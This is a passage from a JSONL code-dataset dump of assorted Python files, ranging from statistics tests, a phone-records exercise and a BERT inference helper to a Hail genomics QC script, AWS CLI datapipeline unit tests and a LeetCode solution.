size)]\n\n\ndef gauss_TEST() -> list:\n mx = 25\n sx = 15\n n = 6\n size = 1000000\n return [gauss(mx, sx, [getRandom() for _ in range(0, n)]) for _ in range(0, size)]\n\n\ndef exponential_TEST() -> list:\n lam = 13\n size = 1000000\n return [exponential(lam, getRandom()) for _ in range(0, size)]\n\n\ndef gamma_TEST() -> list:\n lam = 13\n nu = 14\n n = 6\n size = 1000000\n return [gamma(lam, nu, [getRandom() for _ in range(0, n)]) for _ in range(0, size)]\n\n\ndef triangleMax_TEST() -> list:\n a = 1\n b = 51\n size = 1000000\n return [triangleMax(a, b, getRandom(), getRandom()) for _ in range(0, size)]\n\n\ndef triangleMin_TEST() -> list:\n a = 1\n b = 51\n size = 1000000\n return [triangleMin(a, b, getRandom(), getRandom()) for _ in range(0, size)]\n\n\ndef simpson_TEST() -> list:\n a = 1\n b = 51\n size = 1000000\n return [simpson(a, b, getRandom(), getRandom()) for _ in range(0, size)]\n\n\ndef showHist(__res: list, __output: str):\n offset = min(__res)\n step = (max(__res) - offset)/float(20)\n plt.hist(__res, bins=[i * step + offset for i in range(0, 21)])\n plt.savefig(__output)\n plt.show()\n\nif __name__ == \"__main__\":\n showHist(ravnomer_TEST(), \"ravnomer.png\")\n showHist(gauss_TEST(), \"gauss.png\")\n showHist(exponential_TEST(), \"exponential.png\")\n showHist(gamma_TEST(), \"gamma.png\")\n showHist(triangleMax_TEST(), \"triangleMax.png\")\n showHist(triangleMin_TEST(), \"triangleMin.png\")\n showHist(simpson_TEST(), \"simpson.png\")","repo_name":"FyodorovAleksej/MOD2","sub_path":"generatorDetermine.py","file_name":"generatorDetermine.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"26738263221","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\n\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n# Define a function for getting fix numbers\ndef get_fixed_code(phonenumber):\n close_parenthesis = phonenumber.find(\")\")\n if(close_parenthesis != -1):\n return phonenumber[:(close_parenthesis+1)]\n\n# Define a function for getting cellphone numbers\ndef get_cellphone_code(phonenumber):\n if(phonenumber.startswith('7') or phonenumber.startswith('8') or phonenumber.startswith('9')):\n return phonenumber[:4]\n\n\n\n# Define a function for getting Bangalore's numbers\ndef get_bangalore_numbers(list_numbers):\n bangalore_codes = []\n total_calls = 0\n bangalore_fixed_calls = 0\n flag = True\n for number in list_numbers:\n if number[0].startswith(\"(080)\"):\n if number[1].startswith(\"(0\"):\n fix_code = get_fixed_code(number[1])\n if not fix_code in bangalore_codes:\n bangalore_codes.append(fix_code)\n if(number[1].find(\" \") != -1):\n fix_code = get_cellphone_code(number[1])\n if not fix_code in bangalore_codes:\n bangalore_codes.append(fix_code)\n if(number[1].startswith(\"140\") and flag):\n bangalore_codes.append(\"140\")\n flag = False\n if number[0].startswith(\"(080)\"):\n total_calls = total_calls + 1\n if number[0].startswith(\"(080)\") and number[1].startswith(\"(080)\"):\n bangalore_fixed_calls = bangalore_fixed_calls + 1\n bangalore_codes.sort()\n percentage = (bangalore_fixed_calls / total_calls) * 100\n return bangalore_codes, percentage\n\ndef print_list(list_numbers):\n for number in list_numbers:\n print(number)\n\nprint(\"The numbers called by people in Bangalore have codes:\")\nresult = get_bangalore_numbers(calls)\nprint_list(result[0])\n\nprint(\"{:.2f} percent of calls from fixed lines in Bangalore are calls to other fixed lines in Bangalore.\".format(result[1]))\n\"\"\"\nTASK 3:\n(080) is the area code for fixed line telephones in Bangalore.\nFixed line numbers include parentheses, so Bangalore numbers\nhave the form (080)xxxxxxx.)\n\nPart A: Find all of the area codes and mobile prefixes called by people\nin Bangalore.\n - Fixed lines start with an area code enclosed in brackets. The area\n codes vary in length but always begin with 0.\n - Mobile numbers have no parentheses, but have a space in the middle\n of the number to help readability. The prefix of a mobile number\n is its first four digits, and they always start with 7, 8 or 9.\n - Telemarketers' numbers have no parentheses or space, but they start\n with the area code 140.\n\nPrint the answer as part of a message:\n\"The numbers called by people in Bangalore have codes:\"\n \nThe list of codes should be print out one per line in lexicographic order with no duplicates.\n\nPart B: What percentage of calls from fixed lines in Bangalore are made\nto fixed lines also in Bangalore? In other words, of all the calls made\nfrom a number starting with \"(080)\", what percentage of these calls\nwere made to a number also starting with \"(080)\"?\n\nPrint the answer as a part of a message::\n\" percent of calls from fixed lines in Bangalore are calls\nto other fixed lines in Bangalore.\"\nThe percentage should have 2 decimal digits\n\"\"\"\n\n\"\"\"\nBig O' Notation:\nNotation O(N^2)\n\"\"\"","repo_name":"AugustoAleGon/algoritm-datastructure-p1","sub_path":"Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40243809100","text":"import time\nfrom datetime import datetime\n\nimport pandas as pd\nfrom tqdm import tqdm\n\nimport yticker\n\n\ndef main():\n ylb = yticker.YahooLookupBrowser()\n answers = set()\n\n perpage = 10000\n idx = 0\n letters = list('abcdefghijklmnopqrstuvwxyz')\n queue = list(letters)\n pbar = tqdm(total=len(queue))\n\n while idx < len(queue):\n pbar.set_description(f\"[query = {queue[idx]}]\")\n pbar.refresh()\n\n try:\n t = datetime.now()\n ans, total = ylb.lookup(key=queue[idx], category='all', start=0, size=perpage)\n seconds = (datetime.now() - t).total_seconds()\n pbar.write(f\"query = {queue[idx]} | count = {len(ans)} | total = {total} | seconds = {seconds}\")\n except Exception as e:\n pbar.write(f\"error (idx = {idx}, query = {queue[idx]}): \" + str(e))\n pbar.write(\"wait for 10 seconds...\")\n time.sleep(10) # s\n continue\n\n if total > perpage:\n add = [queue[idx] + '%20' + letter for letter in letters] + [queue[idx] + letter for letter in letters]\n queue += add\n pbar.write(f\"Add new queries {queue[idx]}[%20][a-z] to queue\")\n pbar.reset(total=len(queue))\n pbar.update(n=idx)\n\n answers.update(ans)\n pbar.update()\n idx += 1\n\n answer_list = sorted(list(answers))\n df = pd.DataFrame(answer_list)\n df.to_csv('answers.csv')\n\n\nif __name__ == \"__main__\":\n t_start = datetime.now()\n main()\n print(datetime.now() - t_start)\n","repo_name":"wood-run/yticker","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73115815296","text":"#!/usr/bin/env python\n\n__author__ = \"Abhinav Sarkar \"\n__version__ = \"0.2\"\n__license__ = \"GNU Lesser General Public License\"\n__package__ = \"lastfm\"\n\nfrom lastfm.mixin import mixin\n\n@mixin(\"property_adder\")\nclass Wiki(object):\n \"\"\"A class representing the information from the wiki of the subject.\"\"\"\n \n class Meta(object):\n properties = [\"subject\", \"published\", \"summary\", \"content\"]\n \n def __init__(self,\n subject,\n published = None,\n summary = None,\n content = None):\n self._subject = subject\n self._published = published\n self._summary = summary\n self._content = content\n\n def __repr__(self):\n return \"\" % (self.subject.__class__.__name__, self.subject.name)","repo_name":"jc/python-lastfm","sub_path":"lastfm/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"79"} +{"seq_id":"74158798976","text":"# -*- coding: UTF-8 -*-\n\nimport os\nimport sys\nimport codecs\nimport xml.etree.ElementTree as ET\n#############################################\nrpc_req_id = 'RPC_%(module)s_%(msg_name)s_REQ'\nrpc_notify_id = 'RPC_%(module)s_%(msg_name)s_NOTIFY'\n#############################################\n\nclass GenCsharp(object):\n def __init__(self, root, module):\n self.root = root\n self.module = module\n self.enum_fields = \"\"\n self.module_id = 0\n pass\n\n def write_csharp(self):\n if not self.parse_xml():\n return\n proto_enum = '''\nenum E%(module)s\n{\n MODULE_ID_%(module_upper)s = %(module_id)s,\n %(enum_fields)s\n}\n''' \n proto_enum = proto_enum % {\n \"module\": self.module,\n \"module_upper\": self.module.upper(),\n \"module_id\": self.module_id,\n \"enum_fields\": self.enum_fields,\n }\n return proto_enum\n\n def parse_xml(self):\n self.module_id = self.root.attrib['id']\n if self.root.findall('Message/PublicMsg'):\n return False\n for req_reply in self.root.findall(\"Message/ReqReplyMsg\"):\n msg_id = req_reply.attrib[\"id\"]\n msg_name = req_reply.attrib[\"name\"]\n id_field = rpc_req_id % {\"module\": self.module, \"msg_name\": msg_name}\n id_field = id_field.upper()\n enum_field = id_field + \" = \"+msg_id+\",\\n\\t\\t\"\n self.enum_fields += enum_field\n\n for notify in self.root.findall(\"Message/NotifyMsg/Notify\"):\n msg_id = notify.attrib[\"id\"]\n msg_name = notify.attrib[\"name\"]\n id_field = rpc_notify_id % {\"module\": self.module, \"msg_name\": msg_name}\n id_field = id_field.upper()\n enum_field = id_field + \" = \"+msg_id+\",\\n\\t\\t\"\n self.enum_fields += enum_field\n\n self.enum_fields = self.enum_fields[:-3]\n return True\n","repo_name":"aywfelix/ProtoTool","sub_path":"Program/gen_csharp.py","file_name":"gen_csharp.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41250258986","text":"from models.text_classifier import BertClassifier\nfrom transformers import BertTokenizer\nimport torch\nimport torch.nn as nn\n\ndef infer(sentence):\n\n ## RECOMMENDED TO EXPLICITLY SET IT AS AN ABSOLUTE PATH.\n pt_path = \"/content/CS492FinalProject/TER/bert-best.pth\"\n\n emos = ['joy', 'sadness', 'fear', 'anger', 'neutral']\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\n \n encoded_dict = tokenizer.encode_plus(\n sentence, \n add_special_tokens = True, \n max_length = 140, \n pad_to_max_length = True,\n return_attention_mask = True, \n return_tensors = 'pt',\n )\n\n input_id = encoded_dict['input_ids'].to(device)\n attention_mask = encoded_dict['attention_mask'].to(device)\n\n model = BertClassifier(num_labels=5).to(device)\n\n model.load_state_dict(torch.load(pt_path)[\"model\"])\n output = model(input_id, attention_mask)\n\n pred = torch.max(output, dim=1)[1]\n\n return {\"text\": sentence, \"emotion\": emos[pred]}","repo_name":"yegonkim/CS492FinalProject","sub_path":"TER/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"40069225408","text":"## for ECE479 ICC Lab2 Part3\n\n'''\n*Main Student Script*\n'''\n\n# Your works start here\n\n# Import packages you need here\nfrom inception_resnet import InceptionResNetV1Norm\nimport numpy as np\nimport tensorflow as tf\n\n# Create a model\nmodel = InceptionResNetV1Norm()\n\n# Verify the model and load the weights into the net\nprint(model.summary())\nprint(len(model.layers))\nmodel.load_weights(\"./weights/inception_keras_weights.h5\") # Has been translated from checkpoint\nmodel.save(\"google_net\")\nconverter = tf.lite.TFLiteConverter.from_saved_model(\"/Users/lorenzo/Documents/UIUC/Y2-S2/ECE479/lab2_sp23/code/google_net\")\ntflite_model = converter.convert()\nopen(\"google_net.tflite\",\"wb\").write(tflite_model)","repo_name":"LoganCudia411/ECE479_code","sub_path":"lab2/code/lab2_part3.py","file_name":"lab2_part3.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"34565993748","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2019-12-11\n@author: duytinvo\n\"\"\"\nimport math\nimport torch\nimport numpy as np\nimport torch.nn as nn\n\n\nclass Emb_layer(nn.Module):\n \"\"\"\n This module take (characters or words) indices as inputs and outputs (characters or words) embedding\n \"\"\"\n\n def __init__(self, HPs):\n super(Emb_layer, self).__init__()\n [size, dim, pre_embs, drop_rate, zero_padding, requires_grad] = HPs\n self.zero_padding = zero_padding\n self.embeddings = nn.Embedding(size, dim, padding_idx=0)\n if pre_embs is not None:\n self.embeddings.weight.data.copy_(torch.from_numpy(pre_embs))\n else:\n self.embeddings.weight.data.copy_(torch.from_numpy(self.random_embedding(size, dim)))\n if not requires_grad:\n print(\"Fixed pre-trained embeddings\")\n self.embeddings.weight.requires_grad = requires_grad\n self.drop = nn.Dropout(drop_rate)\n\n def forward(self, inputs, auxiliary_embs=None):\n return self.get_embs(inputs, auxiliary_embs)\n\n def get_embs(self, inputs, auxiliary_embs=None):\n \"\"\"\n embs.shape([0, 1]) == auxiliary_embs.shape([0, 1])\n \"\"\"\n if self.zero_padding:\n # set zero vector for padding, unk, eot, sot\n self.set_zeros([0, 1, 2, 3])\n # embs = tensor(batch_size, seq_length,input_dim)\n embs = self.embeddings(inputs)\n embs_drop = self.drop(embs)\n if auxiliary_embs is not None:\n assert embs_drop.shape[:-1] == auxiliary_embs.shape[:-1]\n embs_drop = torch.cat((embs_drop, auxiliary_embs), -1)\n return embs_drop\n\n def random_embedding(self, size, dim):\n pre_embs = np.empty([size, dim])\n scale = np.sqrt(3.0 / dim)\n for index in range(size):\n pre_embs[index, :] = np.random.uniform(-scale, scale, [1, dim])\n return pre_embs\n\n def set_zeros(self, idx):\n for i in idx:\n self.embeddings.weight.data[i].fill_(0)\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, HPs):\n super(PositionalEncoding, self).__init__()\n [size, dim, pre_embs, drop_rate, zero_padding, requires_grad, max_len] = HPs\n HPs[3] = 0.0\n\n self.wordemb_layer = Emb_layer(HPs[:-1])\n self.dropout = nn.Dropout(p=drop_rate)\n\n pe = torch.zeros(max_len, dim)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, dim, 2).float() * (-math.log(10000.0) / dim))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n\n def forward(self, inputs, auxiliary_embs=None):\n \"\"\"\n :param inputs: word tensors in (batch, length)\n :return: wordpos embs in (batch, length, size)\n \"\"\"\n x = self.wordemb_layer(inputs, auxiliary_embs)\n x = x + self.pe[:, x.size(0), :]\n return self.dropout(x)\n\n\nif __name__ == '__main__':\n word_HPs = [30000, 512, None, 0.0, False, True] # [size, dim, pre_embs, drop_rate, zero_padding, requires_grad]\n wordemb_layer = Emb_layer(word_HPs)\n\n # pos_HPs = [512, 0.1, 5000] # [d_model, dropout, max_len]\n max_len = 5000\n posemb_layer = PositionalEncoding(word_HPs + [max_len])\n\n x = torch.randint(1000, (50, 32)).to(dtype=torch.long)\n wordemb = wordemb_layer(x)\n wordposemb = posemb_layer(x)\n","repo_name":"duytinvo/MLlib","sub_path":"mlmodels/modules/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"23533160570","text":"import os\nfrom os.path import dirname, join\n\nTMP_DIR = join(dirname(__file__), \"tmp\")\nROOT = dirname(dirname(__file__))\nCONFIG_FILE = join(TMP_DIR, \"config.json\")\nCACHE_DIR = join(TMP_DIR, \"cache\")\nSRC_DIR = join(TMP_DIR, \"src\")\nDEST_DIR = join(TMP_DIR, \"dest\")\nREMOTE = \"test\"\n\nos.environ.setdefault(\"LIDLESS_USER_DIR\", TMP_DIR)\nfrom lidless import Config\n\n\nclass BaseAll:\n \"\"\"\n Base class for all tests.\n \"\"\"\n\n def setup_method(self):\n self.roots = {}\n self.targets = {}\n self.settings = {}\n self.default_dest = DEST_DIR\n\n def create_target(self, **kwargs):\n target = {\"tool\": \"rsync\", \"maps\": {SRC_DIR: DEST_DIR}}\n target.update(kwargs)\n return target\n\n def create_root(self, path):\n return join(SRC_DIR, path)\n\n def get_config(self):\n data = {\n \"roots\": self.roots,\n \"settings\": self.settings,\n \"targets\": self.targets,\n }\n return Config(user_dir=TMP_DIR, data=data)\n\n def get_target(self, key):\n return self.get_config().get_target(key)\n\n def get_nodes(self, key):\n return self.get_target(key).nodes\n","repo_name":"slickworks/lidless","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21671112813","text":"general_arguments = [\n 'seed',\n 'reproducibility',\n 'state',\n 'model',\n 'data_path',\n 'checkpoint_dir',\n 'show_progress',\n 'config_file',\n 'log_wandb',\n 'use_modality'\n]\n\ntraining_arguments = [\n 'epochs', 'train_batch_size',\n 'optim_args',\n 'eval_step', 'stopping_step',\n 'clip_grad_norm',\n 'loss_decimal_place',\n]\n\nevaluation_arguments = [\n 'eval_type',\n 'repeatable',\n 'metrics', 'topk', 'valid_metric', 'valid_metric_bigger',\n 'eval_batch_size',\n 'metric_decimal_place',\n]\n\ndataset_arguments = [\n 'MAX_ITEM_LIST_LENGTH'\n]\n\n\n\n\n\n","repo_name":"westlake-repl/PixelRec","sub_path":"code/REC/utils/argument_list.py","file_name":"argument_list.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"79"} +{"seq_id":"16064179033","text":"\n'''\nQC for WGS\nauthor: Pavlos Antoniou\ndate: 22/07/19\n'''\n\nimport os\nimport hail as hl\nimport sys\nimport json\n\n\nCHROMOSOMES = [\"chr2\",\n \"chr3\",\n \"chr4\",\n \"chr5\",\n \"chr6\",\n \"chr7\",\n \"chr8\",\n \"chr9\",\n \"chr10\",\n \"chr11\",\n \"chr12\",\n \"chr13\",\n \"chr14\",\n \"chr15\",\n \"chr16\",\n \"chr17\",\n \"chr18\",\n \"chr19\",\n \"chr20\",\n \"chr21\",\n \"chr22\",\n \"chrX\",\n \"chrY\"\n ]\n\n\n\nBUCKET = \"gs://interval-wgs\"\n#Define chromosome here\ntmp_dir=\"/Users/pa10/Programming/google-code/google/tmp\"\n\nif __name__ == \"__main__\":\n #need to create spark cluster first before intiialising hail\n #Define the hail persistent storage directory\n hl.init(default_reference=\"GRCh38\", tmp_dir=tmp_dir)\n\n\n\n\n\n\n\n\n mt_chr1 = hl.read_matrix_table(f\"{BUCKET}/matrixtables/chr1/chr1-full-sampleqc-variantqc-filtered-FINAL.mt\")\n\n for CHROMOSOME in CHROMOSOMES:\n mt = hl.read_matrix_table(f\"{BUCKET}/matrixtables/{CHROMOSOME}/{CHROMOSOME}-full-sampleqc-variantqc-filtered-FINAL.mt\")\n mt_chr1 = mt_chr1.union_rows(mt)\n\n\n CHROMOSOME=\"WGS\"\n fields_to_drop = ['variant_QC_Hail', 'sample_QC_Hail']\n\n mt1 = mt_chr1.drop(*fields_to_drop)\n\n mt2 = hl.sample_qc(mt1, name='sample_QC_Hail')\n mt3 = hl.variant_qc(mt2, name='variant_QC_Hail')\n\n mt3 = mt3.checkpoint(\n f\"{BUCKET}/matrixtables/{CHROMOSOME}/{CHROMOSOME}-full-sampleqc-variantqc-filtered-FINAL.mt\", overwrite=True)\n mt3_cols = mt3.cols()\n mt3_cols.flatten().export(\n f\"{BUCKET}/output-tables/{CHROMOSOME}/{CHROMOSOME}-sampleQC_filtered_FINAL.tsv.bgz\", header=True)\n\n mt3_rows = mt3.rows()\n mt3_rows.select(mt3_rows.variant_QC_Hail).flatten().export(\n f\"{BUCKET}/output-tables/{CHROMOSOME}/{CHROMOSOME}-variantQC_filtered_FINAL.tsv.bgz\", header=True)\n\n","repo_name":"wtsi-hgi/hail_analysis_pipelines","sub_path":"WGS_QC/custom_annotation_scripts/exporting_table_QC.py","file_name":"exporting_table_QC.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"28583608503","text":"from collections import deque\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def largestValues(self, root: [TreeNode]) -> list[int]:\n ans = []\n if root:\n que = deque()\n que.append(root)\n while que:\n max_of_level = que[0].val\n size = len(que)\n for _ in range(size):\n p = que.popleft()\n max_of_level = max(max_of_level, p.val)\n if p.left:\n que.append(p.left)\n if p.right:\n que.append(p.right)\n ans.append(max_of_level)\n return ans","repo_name":"zcPasser/leetcode_python","sub_path":"code_capriccio/binary_tree/lc515_find-largest-value-in-each-tree-row.py","file_name":"lc515_find-largest-value-in-each-tree-row.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8849004551","text":"from itertools import product, chain\nimport cn2an\nimport argparse\nimport random\nfrom operator import itemgetter\nfrom tsm.util import write_lines_to_file\n\nflatten = lambda l: [item for sublist in l for item in sublist]\ndef generate_year_bitext(start=1, end=2500):\n def year_ordinal_bitext(i):\n mandarin = cn2an.an2cn(i, \"direct\")\n mandarin = mandarin.replace(\"万\", \"萬\")\n taibun = mandarin.replace(\"零\", \"空\")\n o_mandarin = mandarin.replace(\"零\", \"○\")\n return list(product([f\"{mandarin}年\", f\"{i}年\", f\"{o_mandarin}年\"], [f\"{taibun}年\"]))\n\n def year_cardinal_bitext(i):\n mandarin = cn2an.an2cn(i, \"low\")\n mandarin = mandarin.replace(\"万\", \"萬\")\n for numeral in [\"百\", \"千\", \"萬\", \"億\", \"兆\"]:\n mandarin = mandarin.replace(f\"二{numeral}\", f\"兩{numeral}\")\n taibun = mandarin\n return chain(product([f\"{mandarin}年\", f\"{i}年\"], [f\"{taibun}年\", f\"{taibun}冬\"]))\n\n years_ordinals = flatten([year_ordinal_bitext(i) for i in range(start, end)])\n years_cardinals = flatten([year_cardinal_bitext(i) for i in range(start, end)])\n return list(chain(years_ordinals, years_cardinals))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--prefix\")\nparser.add_argument(\"--samples\", type=int, default=0)\nparser.add_argument(\"--start\", type=int, default=1)\nparser.add_argument(\"--end\", type=int, default=25000)\nargs = parser.parse_args()\nbitexts = generate_year_bitext(args.start, args.end)\nif args.samples and len(bitexts) > args.samples:\n bitexts = random.sample(bitexts, args.samples)\n\nmandarins = list(map(itemgetter(0), bitexts))\ntaibuns = list(map(lambda taibun: \" \".join(taibun), map(itemgetter(1), bitexts)))\nwrite_lines_to_file(f\"{args.prefix}.mandarin.txt\", mandarins)\nwrite_lines_to_file(f\"{args.prefix}.taibun.txt\", taibuns)\n","repo_name":"Chung-I/mandarin_to_tsm","sub_path":"synthesize_numerals.py","file_name":"synthesize_numerals.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"16003479281","text":"import copy\nimport unittest\n\nfrom awscli.testutils import mock, BaseAWSHelpOutputTest, BaseAWSCommandParamsTest\n\nfrom awscli.customizations.datapipeline import convert_described_objects\nfrom awscli.customizations.datapipeline import ListRunsCommand\n\n\nAPI_DESCRIBE_OBJECTS = [\n {\"fields\": [\n {\n \"key\": \"@componentParent\",\n \"refValue\": \"S3Input\"\n },\n {\n \"key\": \"@scheduledStartTime\",\n \"stringValue\": \"2013-08-19T20:00:00\"\n },\n {\n \"key\": \"parent\",\n \"refValue\": \"S3Input\"\n },\n {\n \"key\": \"@sphere\",\n \"stringValue\": \"INSTANCE\"\n },\n {\n \"key\": \"type\",\n \"stringValue\": \"S3DataNode\"\n },\n {\n \"key\": \"@version\",\n \"stringValue\": \"1\"\n },\n {\n \"key\": \"@status\",\n \"stringValue\": \"FINISHED\"\n },\n {\n \"key\": \"@actualEndTime\",\n \"stringValue\": \"2014-02-19T19:44:44\"\n },\n {\n \"key\": \"@actualStartTime\",\n \"stringValue\": \"2014-02-19T19:44:43\"\n },\n {\n \"key\": \"output\",\n \"refValue\": \"@MyCopyActivity_2013-08-19T20:00:00\"\n },\n {\n \"key\": \"@scheduledEndTime\",\n \"stringValue\": \"2013-08-19T21:00:00\"\n }\n ],\n \"id\": \"@S3Input_2013-08-19T20:00:00\",\n \"name\": \"@S3Input_2013-08-19T20:00:00\"\n },\n {\"fields\": [\n {\n \"key\": \"@componentParent\",\n \"refValue\": \"MyEC2Resource\"\n },\n {\n \"key\": \"@resourceId\",\n \"stringValue\": \"i-12345\"\n },\n {\n \"key\": \"@scheduledStartTime\",\n \"stringValue\": \"2013-08-19T23:00:00\"\n },\n {\n \"key\": \"parent\",\n \"refValue\": \"MyEC2Resource\"\n },\n {\n \"key\": \"@sphere\",\n \"stringValue\": \"INSTANCE\"\n },\n {\n \"key\": \"@attemptCount\",\n \"stringValue\": \"1\"\n },\n {\n \"key\": \"type\",\n \"stringValue\": \"Ec2Resource\"\n },\n {\n \"key\": \"@version\",\n \"stringValue\": \"1\"\n },\n {\n \"key\": \"@status\",\n \"stringValue\": \"CREATING\"\n },\n {\n \"key\": \"input\",\n \"refValue\": \"@MyCopyActivity_2013-08-19T23:00:00\"\n },\n {\n \"key\": \"@triesLeft\",\n \"stringValue\": \"2\"\n },\n {\n \"key\": \"@actualStartTime\",\n \"stringValue\": \"2014-02-19T19:59:45\"\n },\n {\n \"key\": \"@headAttempt\",\n \"refValue\": \"@MyEC2Resource_2013-08-19T23:00:00_Attempt=1\"\n },\n {\n \"key\": \"@scheduledEndTime\",\n \"stringValue\": \"2013-08-20T00:00:00\"\n }\n ],\n \"id\": \"@MyEC2Resource_2013-08-19T23:00:00\",\n \"name\": \"@MyEC2Resource_2013-08-19T23:00:00\"\n }\n]\n\nJSON_FORMATTER_PATH = 'awscli.formatter.JSONFormatter.__call__'\nLIST_FORMATTER_PATH = 'awscli.customizations.datapipeline.listrunsformatter.ListRunsFormatter.__call__' # noqa\n\n\nclass TestConvertObjects(unittest.TestCase):\n\n def test_convert_described_objects(self):\n converted = convert_described_objects(API_DESCRIBE_OBJECTS)\n self.assertEqual(len(converted), 2)\n # This comes from a \"refValue\" value.\n self.assertEqual(converted[0]['@componentParent'], 'S3Input')\n # Should also merge in @id and name.\n self.assertEqual(converted[0]['@id'], \"@S3Input_2013-08-19T20:00:00\")\n self.assertEqual(converted[0]['name'], \"@S3Input_2013-08-19T20:00:00\")\n # This comes from a \"stringValue\" value.\n self.assertEqual(converted[0]['@sphere'], \"INSTANCE\")\n\n def test_convert_objects_are_sorted(self):\n describe_objects = copy.deepcopy(API_DESCRIBE_OBJECTS)\n # Change the existing @scheduledStartTime from\n # 20:00:00 to 23:59:00\n describe_objects[0]['fields'][1]['stringValue'] = (\n \"2013-08-19T23:59:00\")\n converted = convert_described_objects(\n describe_objects,\n sort_key_func=lambda x: (x['@scheduledStartTime'], x['name']))\n self.assertEqual(converted[0]['@scheduledStartTime'],\n '2013-08-19T23:00:00')\n self.assertEqual(converted[1]['@scheduledStartTime'],\n '2013-08-19T23:59:00')\n\n\nclass FakeParsedArgs(object):\n def __init__(self, **kwargs):\n self.endpoint_url = None\n self.region = None\n self.verify_ssl = None\n self.output = None\n self.query = None\n self.__dict__.update(kwargs)\n\n\nclass TestCommandsRunProperly(BaseAWSCommandParamsTest):\n def setUp(self):\n super(TestCommandsRunProperly, self).setUp()\n self.query_objects = mock.Mock()\n self.describe_objects = mock.Mock()\n self.client = mock.Mock()\n self.client.get_paginator.return_value = self.query_objects\n self.client.describe_objects = self.describe_objects\n\n self.driver.session = mock.Mock()\n self.driver.session.emit_first_non_none_response.return_value = None\n self.driver.session.create_client.return_value = self.client\n self.query_objects.paginate.return_value.build_full_result.\\\n return_value = {'ids': ['object-ids']}\n self.describe_objects.return_value = \\\n {'pipelineObjects': API_DESCRIBE_OBJECTS}\n self.expected_response = convert_described_objects(\n API_DESCRIBE_OBJECTS,\n sort_key_func=lambda x: (x['@scheduledStartTime'], x['name']))\n\n def test_list_runs(self):\n command = ListRunsCommand(self.driver.session)\n command(['--pipeline-id', 'my-pipeline-id'],\n parsed_globals=FakeParsedArgs(region='us-east-1'))\n self.assertTrue(self.query_objects.paginate.called)\n self.describe_objects.assert_called_with(\n pipelineId='my-pipeline-id', objectIds=['object-ids'])\n\n @mock.patch(JSON_FORMATTER_PATH)\n @mock.patch(LIST_FORMATTER_PATH)\n def test_list_runs_formatter_explicit_choice(\n self, list_formatter, json_formatter):\n command = ListRunsCommand(self.driver.session)\n command(['--pipeline-id', 'my-pipeline-id'],\n parsed_globals=FakeParsedArgs(\n region='us-east-1', output='json'))\n json_formatter.assert_called_once_with(\n 'list-runs', self.expected_response)\n self.assertFalse(list_formatter.called)\n\n @mock.patch(JSON_FORMATTER_PATH)\n @mock.patch(LIST_FORMATTER_PATH)\n def test_list_runs_formatter_implicit_choice(\n self, list_formatter, json_formatter):\n\n command = ListRunsCommand(self.driver.session)\n command(['--pipeline-id', 'my-pipeline-id'],\n parsed_globals=FakeParsedArgs(region='us-east-1'))\n list_formatter.assert_called_once_with(\n 'list-runs', self.expected_response)\n self.assertFalse(json_formatter.called)\n\n\nclass TestHelpOutput(BaseAWSHelpOutputTest):\n def test_list_runs_help_output(self):\n self.driver.main(['datapipeline', 'get-pipeline-definition', 'help'])\n self.assert_contains('pipeline definition')\n # The previous API docs should not be in the output\n self.assert_not_contains('pipelineObjects')\n","repo_name":"aws/aws-cli","sub_path":"tests/unit/customizations/datapipeline/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":7400,"program_lang":"python","lang":"en","doc_type":"code","stars":14456,"dataset":"github-code","pt":"79"} +{"seq_id":"3619254496","text":"\"\"\"Update model classes\n\nRevision ID: 6e820d07d39c\nRevises: 